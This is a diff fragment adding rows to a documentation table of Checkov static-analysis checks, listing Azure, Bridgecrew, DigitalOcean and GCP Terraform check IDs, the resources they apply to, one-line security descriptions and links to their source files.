+| 1541 | CKV2_AZURE_8    | resource | azurerm_monitor_activity_log_alert                      | Ensure the storage container storing the activity logs is not publicly accessible                                                                                                                        | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml)                                           |
+| 1542 | CKV2_AZURE_8    | resource | azurerm_storage_account                                 | Ensure the storage container storing the activity logs is not publicly accessible                                                                                                                        | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml)                                           |
+| 1543 | CKV2_AZURE_8    | resource | azurerm_storage_container                               | Ensure the storage container storing the activity logs is not publicly accessible                                                                                                                        | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml)                                           |
+| 1544 | CKV2_AZURE_9    | resource | azurerm_virtual_machine                                 | Ensure Virtual Machines are utilizing Managed Disks                                                                                                                                                      | Terraform | [VirtualMachinesUtilizingManagedDisks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VirtualMachinesUtilizingManagedDisks.yaml)                                             |
+| 1545 | CKV2_AZURE_10   | resource | azurerm_virtual_machine                                 | Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines                                                                                                            | Terraform | [AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml)                   |
+| 1546 | CKV2_AZURE_10   | resource | azurerm_virtual_machine_extension                       | Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines                                                                                                            | Terraform | [AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml)                   |
+| 1547 | CKV2_AZURE_11   | resource | azurerm_kusto_cluster                                   | Ensure that Azure Data Explorer encryption at rest uses a customer-managed key                                                                                                                           | Terraform | [DataExplorerEncryptionUsesCustomKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/DataExplorerEncryptionUsesCustomKey.yaml)                                               |
+| 1548 | CKV2_AZURE_12   | resource | azurerm_virtual_machine                                 | Ensure that virtual machines are backed up using Azure Backup                                                                                                                                            | Terraform | [VMHasBackUpMachine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VMHasBackUpMachine.yaml)                                                                                 |
+| 1549 | CKV2_AZURE_13   | resource | azurerm_mssql_server_security_alert_policy              | Ensure that sql servers enables data security policy                                                                                                                                                     | Terraform | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml)                                         |
+| 1550 | CKV2_AZURE_13   | resource | azurerm_sql_server                                      | Ensure that sql servers enables data security policy                                                                                                                                                     | Terraform | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml)                                         |
+| 1551 | CKV2_AZURE_14   | resource | azurerm_managed_disk                                    | Ensure that Unattached disks are encrypted                                                                                                                                                               | Terraform | [AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml)                                                     |
+| 1552 | CKV2_AZURE_14   | resource | azurerm_virtual_machine                                 | Ensure that Unattached disks are encrypted                                                                                                                                                               | Terraform | [AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml)                                                     |
+| 1553 | CKV2_AZURE_15   | resource | azurerm_data_factory                                    | Ensure that Azure data factories are encrypted with a customer-managed key                                                                                                                               | Terraform | [AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml)                   |
+| 1554 | CKV2_AZURE_16   | resource | azurerm_mysql_server                                    | Ensure that MySQL server enables customer-managed key for encryption                                                                                                                                     | Terraform | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml)                                                           |
+| 1555 | CKV2_AZURE_16   | resource | azurerm_mysql_server_key                                | Ensure that MySQL server enables customer-managed key for encryption                                                                                                                                     | Terraform | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml)                                                           |
+| 1556 | CKV2_AZURE_17   | resource | azurerm_postgresql_server                               | Ensure that PostgreSQL server enables customer-managed key for encryption                                                                                                                                | Terraform | [PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml)                                                         |
+| 1557 | CKV2_AZURE_17   | resource | azurerm_postgresql_server_key                           | Ensure that PostgreSQL server enables customer-managed key for encryption                                                                                                                                | Terraform | [PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml)                                                         |
+| 1558 | CKV2_AZURE_19   | resource | azurerm_synapse_workspace                               | Ensure that Azure Synapse workspaces have no IP firewall rules attached                                                                                                                                  | Terraform | [AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml)               |
+| 1559 | CKV2_AZURE_20   | resource | azurerm_log_analytics_storage_insights                  | Ensure Storage logging is enabled for Table service for read requests                                                                                                                                    | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml)                                         |
+| 1560 | CKV2_AZURE_20   | resource | azurerm_storage_account                                 | Ensure Storage logging is enabled for Table service for read requests                                                                                                                                    | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml)                                         |
+| 1561 | CKV2_AZURE_20   | resource | azurerm_storage_table                                   | Ensure Storage logging is enabled for Table service for read requests                                                                                                                                    | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml)                                         |
+| 1562 | CKV2_AZURE_21   | resource | azurerm_log_analytics_storage_insights                  | Ensure Storage logging is enabled for Blob service for read requests                                                                                                                                     | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml)                                           |
+| 1563 | CKV2_AZURE_21   | resource | azurerm_storage_account                                 | Ensure Storage logging is enabled for Blob service for read requests                                                                                                                                     | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml)                                           |
+| 1564 | CKV2_AZURE_21   | resource | azurerm_storage_container                               | Ensure Storage logging is enabled for Blob service for read requests                                                                                                                                     | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml)                                           |
+| 1565 | CKV2_AZURE_22   | resource | azurerm_cognitive_account                               | Ensure that Cognitive Services enables customer-managed key for encryption                                                                                                                               | Terraform | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml)                                               |
+| 1566 | CKV2_AZURE_22   | resource | azurerm_cognitive_account_customer_managed_key          | Ensure that Cognitive Services enables customer-managed key for encryption                                                                                                                               | Terraform | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml)                                               |
+| 1567 | CKV2_AZURE_23   | resource | azurerm_spring_cloud_service                            | Ensure Azure spring cloud is configured with Virtual network (Vnet)                                                                                                                                      | Terraform | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSpringCloudConfigWithVnet.yaml)                                                         |
+| 1568 | CKV2_AZURE_24   | resource | azurerm_automation_account                              | Ensure Azure automation account does NOT have overly permissive network access                                                                                                                           | Terraform | [AzureAutomationAccNotOverlyPermissiveNetAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccNotOverlyPermissiveNetAccess.yaml)                         |
+| 1569 | CKV2_AZURE_25   | resource | azurerm_mssql_database                                  | Ensure Azure SQL database Transparent Data Encryption (TDE) is enabled                                                                                                                                   | Terraform | [AzureSqlDbEnableTransparentDataEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSqlDbEnableTransparentDataEncryption.yaml)                                   |
+| 1570 | CKV2_AZURE_26   | resource | azurerm_postgresql_flexible_server_firewall_rule        | Ensure Azure PostgreSQL Flexible server is not configured with overly permissive network access                                                                                                          | Terraform | [AzurePostgreSQLFlexServerNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLFlexServerNotOverlyPermissive.yaml)                             |
+| 1571 | CKV2_AZURE_27   | resource | azurerm_mssql_server                                    | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL)                                                                                                                                          | Terraform | [AzureConfigMSSQLwithAD.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureConfigMSSQLwithAD.yaml)                                                                         |
+| 1572 | CKV2_AZURE_28   | resource | azurerm_container_group                                 | Ensure Container Instance is configured with managed identity                                                                                                                                            | Terraform | [AzureContainerInstanceconfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureContainerInstanceconfigManagedIdentity.yaml)                               |
+| 1573 | CKV2_AZURE_29   | resource | azurerm_kubernetes_cluster                              | Ensure AKS cluster has Azure CNI networking enabled                                                                                                                                                      | Terraform | [AzureAKSclusterAzureCNIEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAKSclusterAzureCNIEnabled.yaml)                                                         |
+| 1574 | CKV2_AZURE_30   | resource | azurerm_container_registry_webhook                      | Ensure Azure Container Registry (ACR) has HTTPS enabled for webhook                                                                                                                                      | Terraform | [AzureACR_HTTPSwebhook.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureACR_HTTPSwebhook.yaml)                                                                           |
+| 1575 | CKV2_AZURE_31   | resource | azurerm_subnet                                          | Ensure VNET subnet is configured with a Network Security Group (NSG)                                                                                                                                     | Terraform | [AzureSubnetConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSubnetConfigWithNSG.yaml)                                                                     |
+| 1576 | CKV2_AZURE_32   | resource | azurerm_key_vault                                       | Ensure private endpoint is configured to key vault                                                                                                                                                       | Terraform | [AzureKeyVaultConfigPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureKeyVaultConfigPrivateEndpoint.yaml)                                                 |
+| 1577 | CKV2_AZURE_33   | resource | azurerm_storage_account                                 | Ensure storage account is configured with private endpoint                                                                                                                                               | Terraform | [AzureStorageAccConfigWithPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithPrivateEndpoint.yaml)                                     |
+| 1578 | CKV2_AZURE_34   | resource | azurerm_sql_firewall_rule                               | Ensure Azure SQL server firewall is not overly permissive                                                                                                                                                | Terraform | [AzureSQLserverNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSQLserverNotOverlyPermissive.yaml)                                                   |
+| 1579 | CKV2_AZURE_35   | resource | azurerm_recovery_services_vault                         | Ensure Azure recovery services vault is configured with managed identity                                                                                                                                 | Terraform | [AzureRecoveryServicesvaultConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureRecoveryServicesvaultConfigManagedIdentity.yaml)                       |
+| 1580 | CKV2_AZURE_36   | resource | azurerm_automation_account                              | Ensure Azure automation account is configured with managed identity                                                                                                                                      | Terraform | [AzureAutomationAccConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccConfigManagedIdentity.yaml)                                       |
+| 1581 | CKV2_AZURE_37   | resource | azurerm_mariadb_server                                  | Ensure Azure MariaDB server is using latest TLS (1.2)                                                                                                                                                    | Terraform | [AzureMariaDBserverUsingTLS_1_2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverUsingTLS_1_2.yaml)                                                         |
+| 1582 | CKV2_AZURE_38   | resource | azurerm_storage_account                                 | Ensure soft-delete is enabled on Azure storage account                                                                                                                                                   | Terraform | [AzureStorageAccountEnableSoftDelete.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccountEnableSoftDelete.yaml)                                               |
+| 1583 | CKV2_AZURE_39   | resource | azurerm_linux_virtual_machine                           | Ensure Azure VM is not configured with public IP and serial console access                                                                                                                               | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml)                                   |
+| 1584 | CKV2_AZURE_39   | resource | azurerm_network_interface                               | Ensure Azure VM is not configured with public IP and serial console access                                                                                                                               | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml)                                   |
+| 1585 | CKV2_AZURE_39   | resource | azurerm_virtual_machine                                 | Ensure Azure VM is not configured with public IP and serial console access                                                                                                                               | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml)                                   |
+| 1586 | CKV2_AZURE_39   | resource | azurerm_windows_virtual_machine                         | Ensure Azure VM is not configured with public IP and serial console access                                                                                                                               | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml)                                   |
+| 1587 | CKV2_AZURE_40   | resource | azurerm_storage_account                                 | Ensure storage account is not configured with Shared Key authorization                                                                                                                                   | Terraform | [AzureStorageAccConfigSharedKeyAuth.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigSharedKeyAuth.yaml)                                                 |
+| 1588 | CKV2_AZURE_41   | resource | azurerm_storage_account                                 | Ensure storage account is configured with SAS expiration policy                                                                                                                                          | Terraform | [AzureStorageAccConfig_SAS_expirePolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfig_SAS_expirePolicy.yaml)                                         |
+| 1589 | CKV2_AZURE_42   | resource | azurerm_postgresql_server                               | Ensure Azure PostgreSQL server is configured with private endpoint                                                                                                                                       | Terraform | [AzurePostgreSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLserverConfigPrivEndpt.yaml)                                             |
+| 1590 | CKV2_AZURE_43   | resource | azurerm_mariadb_server                                  | Ensure Azure MariaDB server is configured with private endpoint                                                                                                                                          | Terraform | [AzureMariaDBserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverConfigPrivEndpt.yaml)                                                   |
+| 1591 | CKV2_AZURE_44   | resource | azurerm_mysql_server                                    | Ensure Azure MySQL server is configured with private endpoint                                                                                                                                            | Terraform | [AzureMySQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMySQLserverConfigPrivEndpt.yaml)                                                       |
+| 1592 | CKV2_AZURE_45   | resource | azurerm_mssql_server                                    | Ensure Microsoft SQL server is configured with private endpoint                                                                                                                                          | Terraform | [AzureMSSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLserverConfigPrivEndpt.yaml)                                                       |
+| 1593 | CKV2_AZURE_46   | resource | azurerm_synapse_workspace_security_alert_policy         | Ensure that Azure Synapse Workspace vulnerability assessment is enabled                                                                                                                                  | Terraform | [AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml)                                                     |
+| 1594 | CKV2_AZURE_46   | resource | azurerm_synapse_workspace_vulnerability_assessment      | Ensure that Azure Synapse Workspace vulnerability assessment is enabled                                                                                                                                  | Terraform | [AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml)                                                     |
+| 1595 | CKV2_AZURE_47   | resource | azurerm_storage_account                                 | Ensure storage account is configured without blob anonymous access                                                                                                                                       | Terraform | [AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml)                       |
+| 1596 | CKV2_AZURE_48   | resource | azurerm_databricks_workspace                            | Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption                                                                                                                  | Terraform | [DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.yaml) |
+| 1597 | CKV2_AZURE_49   | resource | azurerm_machine_learning_workspace                      | Ensure that Azure Machine learning workspace is not configured with overly permissive network access                                                                                                     | Terraform | [AzureMLWorkspacePublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspacePublicNetwork.yaml)                                                           |
+| 1598 | CKV2_AZURE_50   | resource | azurerm_machine_learning_workspace                      | Ensure Azure Storage Account storing Machine Learning workspace high business impact data is not publicly accessible                                                                                     | Terraform | [AzureMLWorkspaceHBIPublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspaceHBIPublicNetwork.yaml)                                                     |
+| 1599 | CKV2_AZURE_50   | resource | azurerm_storage_account                                 | Ensure Azure Storage Account storing Machine Learning workspace high business impact data is not publicly accessible                                                                                     | Terraform | [AzureMLWorkspaceHBIPublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspaceHBIPublicNetwork.yaml)                                                     |
+| 1600 | CKV2_AZURE_51   | resource | azurerm_synapse_sql_pool                                | Ensure Synapse SQL Pool has a security alert policy                                                                                                                                                      | Terraform | [SynapseSQLPoolHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasSecurityAlertPolicy.yaml)                                             |
+| 1601 | CKV2_AZURE_51   | resource | azurerm_synapse_sql_pool_security_alert_policy          | Ensure Synapse SQL Pool has a security alert policy                                                                                                                                                      | Terraform | [SynapseSQLPoolHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasSecurityAlertPolicy.yaml)                                             |
+| 1602 | CKV2_AZURE_52   | resource | azurerm_synapse_sql_pool                                | Ensure Synapse SQL Pool has vulnerability assessment attached                                                                                                                                            | Terraform | [SynapseSQLPoolHasVulnerabilityAssessment.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasVulnerabilityAssessment.yaml)                                     |
+| 1603 | CKV2_AZURE_52   | resource | azurerm_synapse_sql_pool_security_alert_policy          | Ensure Synapse SQL Pool has vulnerability assessment attached                                                                                                                                            | Terraform | [SynapseSQLPoolHasVulnerabilityAssessment.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasVulnerabilityAssessment.yaml)                                     |
+| 1604 | CKV2_AZURE_52   | resource | azurerm_synapse_sql_pool_vulnerability_assessment       | Ensure Synapse SQL Pool has vulnerability assessment attached                                                                                                                                            | Terraform | [SynapseSQLPoolHasVulnerabilityAssessment.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasVulnerabilityAssessment.yaml)                                     |
+| 1605 | CKV2_AZURE_53   | resource | azurerm_synapse_workspace                               | Ensure Azure Synapse Workspace has extended audit logs                                                                                                                                                   | Terraform | [SynapseWorkspaceHasExtendedAuditLogs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseWorkspaceHasExtendedAuditLogs.yaml)                                             |
+| 1606 | CKV2_AZURE_54   | resource | azurerm_synapse_sql_pool                                | Ensure log monitoring is enabled for Synapse SQL Pool                                                                                                                                                    | Terraform | [SynapseLogMonitoringEnabledForSQLPool.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseLogMonitoringEnabledForSQLPool.yaml)                                           |
+| 1607 | CKV2_AZURE_54   | resource | azurerm_synapse_sql_pool_extended_auditing_policy       | Ensure log monitoring is enabled for Synapse SQL Pool                                                                                                                                                    | Terraform | [SynapseLogMonitoringEnabledForSQLPool.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseLogMonitoringEnabledForSQLPool.yaml)                                           |
+| 1608 | CKV_BCW_1       | provider | bridgecrew                                              | Ensure no hard coded API token exist in the provider                                                                                                                                                     | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/bridgecrew/credentials.py)                                                                                                  |
+| 1609 | CKV_DIO_1       | resource | digitalocean_spaces_bucket                              | Ensure the Spaces bucket has versioning enabled                                                                                                                                                          | Terraform | [SpacesBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketVersioning.py)                                                                          |
+| 1610 | CKV_DIO_2       | resource | digitalocean_droplet                                    | Ensure the droplet specifies an SSH key                                                                                                                                                                  | Terraform | [DropletSSHKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/DropletSSHKeys.py)                                                                                          |
+| 1611 | CKV_DIO_3       | resource | digitalocean_spaces_bucket                              | Ensure the Spaces bucket is private                                                                                                                                                                      | Terraform | [SpacesBucketPublicRead.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketPublicRead.py)                                                                          |
+| 1612 | CKV_DIO_4       | resource | digitalocean_firewall                                   | Ensure the firewall ingress is not wide open                                                                                                                                                             | Terraform | [FirewallIngressOpen.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/FirewallIngressOpen.py)                                                                                |
+| 1613 | CKV_GCP_1       | resource | google_container_cluster                                | Ensure Stackdriver Logging is set to Enabled on Kubernetes Engine Clusters                                                                                                                               | Terraform | [GKEClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClusterLogging.py)                                                                                             |
+| 1614 | CKV_GCP_2       | resource | google_compute_firewall                                 | Ensure Google compute firewall ingress does not allow unrestricted ssh access                                                                                                                            | Terraform | [GoogleComputeFirewallUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress22.py)                                           |
+| 1615 | CKV_GCP_3       | resource | google_compute_firewall                                 | Ensure Google compute firewall ingress does not allow unrestricted rdp access                                                                                                                            | Terraform | [GoogleComputeFirewallUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3389.py)                                       |
+| 1616 | CKV_GCP_4       | resource | google_compute_ssl_policy                               | Ensure no HTTPS or SSL proxy load balancers permit SSL policies with weak cipher suites                                                                                                                  | Terraform | [GoogleComputeSSLPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSSLPolicy.py)                                                                                   |
+| 1617 | CKV_GCP_6       | resource | google_sql_database_instance                            | Ensure all Cloud SQL database instance requires all incoming connections to use SSL                                                                                                                      | Terraform | [GoogleCloudSqlDatabaseRequireSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabaseRequireSsl.py)                                                               |
+| 1618 | CKV_GCP_7       | resource | google_container_cluster                                | Ensure Legacy Authorization is set to Disabled on Kubernetes Engine Clusters                                                                                                                             | Terraform | [GKEDisableLegacyAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDisableLegacyAuth.py)                                                                                       |
+| 1619 | CKV_GCP_8       | resource | google_container_cluster                                | Ensure Stackdriver Monitoring is set to Enabled on Kubernetes Engine Clusters                                                                                                                            | Terraform | [GKEMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMonitoringEnabled.py)                                                                                       |
+| 1620 | CKV_GCP_9       | resource | google_container_node_pool                              | Ensure 'Automatic node repair' is enabled for Kubernetes Clusters                                                                                                                                        | Terraform | [GKENodePoolAutoRepairEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoRepairEnabled.py)                                                                       |
+| 1621 | CKV_GCP_10      | resource | google_container_node_pool                              | Ensure 'Automatic node upgrade' is enabled for Kubernetes Clusters                                                                                                                                       | Terraform | [GKENodePoolAutoUpgradeEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoUpgradeEnabled.py)                                                                     |
+| 1622 | CKV_GCP_11      | resource | google_sql_database_instance                            | Ensure that Cloud SQL database Instances are not open to the world                                                                                                                                       | Terraform | [GoogleCloudSqlDatabasePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabasePubliclyAccessible.py)                                               |
+| 1623 | CKV_GCP_12      | resource | google_container_cluster                                | Ensure Network Policy is enabled on Kubernetes Engine Clusters                                                                                                                                           | Terraform | [GKENetworkPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENetworkPolicyEnabled.py)                                                                                 |
+| 1624 | CKV_GCP_13      | resource | google_container_cluster                                | Ensure client certificate authentication to Kubernetes Engine Clusters is disabled                                                                                                                       | Terraform | [GKEClientCertificateDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClientCertificateDisabled.py)                                                                       |
+| 1625 | CKV_GCP_14      | resource | google_sql_database_instance                            | Ensure all Cloud SQL database instance have backup configuration enabled                                                                                                                                 | Terraform | [GoogleCloudSqlBackupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlBackupConfiguration.py)                                                             |
+| 1626 | CKV_GCP_15      | resource | google_bigquery_dataset                                 | Ensure that BigQuery datasets are not anonymously or publicly accessible                                                                                                                                 | Terraform | [GoogleBigQueryDatasetPublicACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleBigQueryDatasetPublicACL.py)                                                                   |
